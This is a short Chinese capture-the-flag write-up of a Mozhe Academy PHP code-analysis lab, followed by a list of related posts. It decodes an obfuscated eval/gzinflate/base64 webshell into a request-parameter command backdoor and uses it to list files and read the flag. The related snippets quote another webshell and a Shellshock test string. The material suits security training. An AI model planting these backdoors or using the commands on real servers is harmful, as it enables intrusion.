墨者学院 - PHP代码分析溯源(第4题)

打开发现提示key在根目录，且给出代码
<?php
eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&)));
?>
这是base64加密+压缩的编码
简单方法就是直接把eval改成echo输出
执行<?php
echo(gzinflate(base64_decode(‘40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==’)));
?>

得到echo `$_REQUEST[a]`;; ?>
发现有命令执行漏洞

直接给a传入 ls -al

ip/f.php?a=ls 显示所有文件

发现key，直接用cat没读出来（查看源码可看到），用tac读取得到key。

墨者学院 - PHP代码分析溯源(第4题)相关推荐

墨者学院 PHP代码分析溯源(第4题) 详解
今天继续给大家介绍CTF通关writeup,本文主要内容是墨者学院 PHP代码分析溯源(第4题). 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负 ...
墨者学院-PHP代码分析溯源(第4题)
PHP代码分析溯源(第4题) 难易程度:★★★ 题目类型:命令执行使用工具:FireFox浏览器 1.打开靶场,看到一串php代码. 2.使用echo,运行一下代码. <?php echo(g ...
墨者学院 - WebShell代码分析溯源(第8题)
审查代码 1.先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2.没有新的发现,就去目录查找,根据最后的修改时间排查. C:\Users\BayernChenTutu\D ...
墨者学院 - PHP代码分析溯源(第2题)
根据题干看了好久的php隐式转换... 还是毫无头绪... 这样的逻辑几乎是无解的... md5(QNKCDZO,32) = 0e830400451993494058024219903391 根据PH ...
墨者学院-编辑器漏洞分析溯源(第1题)
编辑器漏洞分析溯源(第1题) 难易程度:★★ 题目类型:编辑器漏洞使用工具:FireFox浏览器.burpsuite.菜刀 1.打开靶场,看到提示信息显示fckeditor. 2.首先查看fcked ...
墨者学院-Bash漏洞分析溯源
Bash漏洞分析溯源难易程度:★★ 题目类型:命令执行使用工具:FireFox浏览器.wwwscan 1.打开靶场,根据题目思路找poc.cgi. 2.使用wwwscan扫一下发现有目录/cgi ...
WebShell代码分析溯源(第1题)墨者学院
一.访问链接二.下载系统源码后直接放到D盾里扫描,扫到后门文件三.查看该木马文件 <?php error_reporting(0); $_GET['POST']($_POST['GET']) ...
墨者学院 - Bash漏洞分析溯源
bash漏洞技术层面分析漏洞起源: 漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告,其中出现了一条验证命令: env x='() { :;}; echo vulne ...
[墨者学院] 日志文件分析溯源(脱裤的IP地址)
背景介绍某公司安全工程师发现公司有黑客入侵并拖库的痕迹,你能帮忙找一下黑客拖库的IP地址吗? 实训目标 1.了解mysql日志结构: 2.了解web日志结构: 解题方向分析web日志和mysql日 ...

墨者学院 - PHP代码分析溯源(第4题)

墨者学院 - PHP代码分析溯源(第4题)相关推荐

最新文章

热门文章